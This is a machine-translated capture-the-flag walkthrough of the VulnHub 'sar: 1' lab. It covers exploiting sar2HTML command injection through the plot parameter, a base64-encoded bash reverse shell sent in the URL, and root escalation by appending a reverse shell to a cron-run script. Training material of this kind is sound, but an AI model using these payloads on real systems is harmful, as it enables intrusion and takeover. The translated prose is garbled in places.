One 、 Preface

OSCP-2:

The target plane for this exercise is vulnhub Under the platform sar, The target is a similar oscp Virtual machine , The purpose is to improve and consolidate the knowledge points of penetration test .

Main utilization mode ：sar2HTML Command execution bounce shell（ can php File upload bounce shell）+ Timed script authorization

Two 、 Target information

shooting range : vulnhub.com

Target name : sar: 1

difficulty : Simple

Release time : 2020 year 2 month 15 Japan

Download address ：https://www.vulnhub.com/entry/sar-1,425/

remarks ： This target plane , Whether in the process of obtaining low permissions at the first level or root jurisdiction , There are many ways .

  Such as ： Can pass sar2HTML RCE Command execution （get that will do ）, You can also upload through files php  take webshell

        At the time of power withdrawal , You can upload it before webshell Point to Timing task , Or use nc rebound shell wait

3、 ... and 、 Virtual machine configuration

         The network connection mode adopted this time is still NAT Pattern , To avoid scanning to other physical hosts . After importing the virtual machine , Right click sar Drone aircraft , Then check configuration . In turn, click The network configuration ->NAT Pattern -> senior -> Generate , Then confirm .

Four 、 Collect information and attack in the first stage

1、 Target detector ip Address

└─$ sudo arp-scan -I eth0 -l

2、nmap Target detection IP Open port of

└─$ sudo nmap -p- 192.168.169.141

3、nmap Probe 80 Port open service and service information

└─$ sudo nmap -p80 -sV -A 192.168.169.141

-A Represents a comprehensive scan , Can collect a lot of important information

-sV The representative scans the main service information

-p- Parameters p Is the specified port , hinder - Represents all ports .

4、 Found only open 80 port , It seems that the breakthrough can only be from web I'm looking for . Open the website with a browser .

5、 Path search , Find No dirsearch Method , The automatic installation of the machine also failed , Package address not found

└─$ dirsearch -u 192.168.169.141  

6、 Replace the reference source

kali Unable to locate package - Quicksand mass

Kali Linux E:Unable to locate package Perfect solution ！ - Grey letter network （ Software development blog aggregation ）

7、 Normal execution dirsearch command , Detect sensitive paths

└─$ dirsearch -u 192.168.169.141

8、 By convention , Inquire about phpinfo.php 、robots.txt Sensitive directory, etc

http://192.168.169.141/phpinfo.php

9、 Inquire about robots.txt

10、 Inquire about sar2HTML page , routine web project

http://192.168.169.141/sar2HTML/

http://192.168.169.141/sar2HTML/

11、 kali Search for known sar2html Loophole , found RCE Loophole

└─$ searchsploit sar2html

12、 take sar2html Copy the script used to the local .

└─$ searchsploit -m php/webapps/49344.py

13、 Check the utilization , What you can find and use is plot The entrance of .

└─$ cat 49344.py

14、 Preferred view passwd Related information

http://192.168.169.142/index.php?plot=;cat /etc/passwd

15、 Upload files , Try uploading jpg And php file , The platform has no filtering measures

16、 stay github The upload address can be found in the source code in ,

17、 Edit a php rebound shell Of Trojans

（github You can download it directly ,GitHub - pentestmonkey/php-reverse-shell)

Be careful ： To put ip Change to kali Of ip, port port Just set up one .

18、 Set listening port

└─$ nc -lnvp 7777

19. Access Trojan , rebound shell

There is no filter for uploading files here , And this GitHub The default path is given on the address , Try the default path to know the upload directly shell The path of

20、 That's through php Upload bounce shell The way , But I don't know why , This time, the rebound was not successful , But it's time to check others writeup It is found that there is a successful rebound .

21、 By returning RCE Script testing , The target is for -e Input , The rebound failed , It could be the target's nc Disabled -e Parameters

         After testing , Can pass base64 code RCE The command can bounce normally shell.

└─$ echo "bash -i &>/dev/tcp/192.168.169.129/8888 <&1" | base64

obtain base64 Encrypted data ：YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTY5LjEyOS84ODg4IDwmMQo=

22、 Then combined into the following payload, That is, on the target plane YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTY5LjEyOS84ODg4IDwmMQo= Conduct base64 Decode and then execute

echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTY5LjEyOS84ODg4IDwmMQo= | base64 -d | bash

23、 On the attack plane nc monitor 8888 port , Then the browser accesses

http://192.168.169.142/sar2HTML/index.php?plot=;echo%20YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTY5LjEyOS84ODg4IDwmMQo=%20|%20base64%20-d%20|%20bash

24、cd To the highest authority var Catalog , Inquire about var Target machine with low permission under the directory flag.

find /home -iname "*.txt"|grep -v 'proc\|sys'

[email protected]:/var$ find /home -iname "*.txt"|grep -v 'proc\|sys'

find /home -iname "*.txt"|grep -v 'proc\|sys'

find: '/home/love/.local': Permission denied

find: '/home/love/.cache': Permission denied

find: '/home/love/.gnupg': Permission denied

find: '/home/love/.gvfs': Permission denied

find: '/home/love/.dbus': Permission denied

find: '/home/love/.ssh': Permission denied

find: '/home/love/.config': Permission denied

/home/love/Desktop/user.txt

[email protected]:/var$ cat /home/love/Desktop/user.txt

cat /home/love/Desktop/user.txt

427a7e47deb4a8649c7cab38df232b52

[email protected]:/var$

5、 ... and 、 Raise the right

25、 Get shell After that, I first tried suid Raise the right , The core raises the right , But it didn't work ！ No special files were found in the directory , Then go to the root directory of the website to find special files .

cd /var/www/html

ls -la

26、 Two special files were found ：finally.sh This file belongs to root,write.sh This file has 777 jurisdiction . Check the contents of these two files .

cat finally.sh

cat write.sh

27、 Find out finally.sh The content of the is to execute write.sh file , and write.sh The function of a file is to create a file  /tmp/gateway.

      Therefore, I thought of planning tasks and raising rights , Check it out. Profile for scheduled tasks /etc/crontab.

28、 The timing plan is not configured properly , The system will start every five minutes with root Permissions to perform finally.sh. The end result is to create a file .

       If you use this timer, it will bounce shell Write the code of write.sh in , To perform , Right can be raised .

29、 Will bounce shell Command write /var/www/html/write.sh, And check whether the writing is successful

          $ echo "bash -c 'exec bash -i &>/dev/tcp/192.168.169.129/6666 <&1'" >> write.sh

• There is a pit in this place , Is rebounding shell In the console , If you use vi Instructions , In the input rebound shell After the command , There is no way to execute normally ：wq！ command , And press ctrl +c == sign out shell Pattern ,
• This is the time , Need to upgrade shell Control terminal ,python -c "import pty;pty.spawn('/bin/bash')"

30、 On the attack plane nc monitor 6666 port

nc -nlvp 6666

31、 After waiting for a moment ,root Rebound of authority shell The official launch , Skillfully check ID as well as root.txt

       obtain root Under the authority of flag

         cat /root/root.txt

         66f93d6b2ca96c9ad78a8a9ba0008e99

32、 Check again after you get the permission ip , Prove to have got the final target root jurisdiction

This machine can be found IP by ：192.168.169.142. According to the previous query, the attacker IP by ：192.168.169.129